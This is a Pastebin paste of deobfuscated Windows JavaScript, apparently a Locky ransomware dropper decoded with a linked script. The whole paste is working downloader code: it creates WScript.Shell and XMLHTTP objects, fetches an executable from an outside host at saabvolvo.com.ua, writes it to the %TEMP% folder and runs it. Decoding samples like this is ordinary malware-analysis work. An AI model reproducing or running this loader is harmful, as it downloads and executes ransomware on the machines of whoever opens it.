Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // js_locky_decode.py -> https://gist.github.com/guelfoweb/1b7c4ecc3a2a7d8947ad
- var rCcrInJvw = 'Run';
- var eBPKMe = this['ActiveXObject'];
- var BSvlbD = new eBPKMe('WScript.Shell');
- var IJjCIdBpl = BSvlbD['ExpandEnvironmentStrings']('%TEMP%') + '/onqggSyNk.exe';
- var ETADikKjU = new eBPKMe('MSXML2.XMLHTTP');
- ETADikKjU['onreadystatechange'] = function () {
- if (ETADikKjU['readystate'] === 4) {
- var RjMmg = new eBPKMe('ADODB.Stream');
- RjMmg['open']();
- RjMmg['type'] = 1;
- RjMmg['write'](ETADikKjU['ResponseBody']);
- RjMmg['position'] = 0;
- RjMmg['saveToFile'](IJjCIdBpl, 2);
- RjMmg['close']();
- };
- };
- try {
- ETADikKjU['open']('GET', 'http://saabvolvo.com.ua/system/logs/7ygvtyvb7niim.exe', false);
- ETADikKjU['send']();
- BSvlbD[rCcrInJvw](IJjCIdBpl, 1, ![]+[]);
- } catch (JUfhQOq) { };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
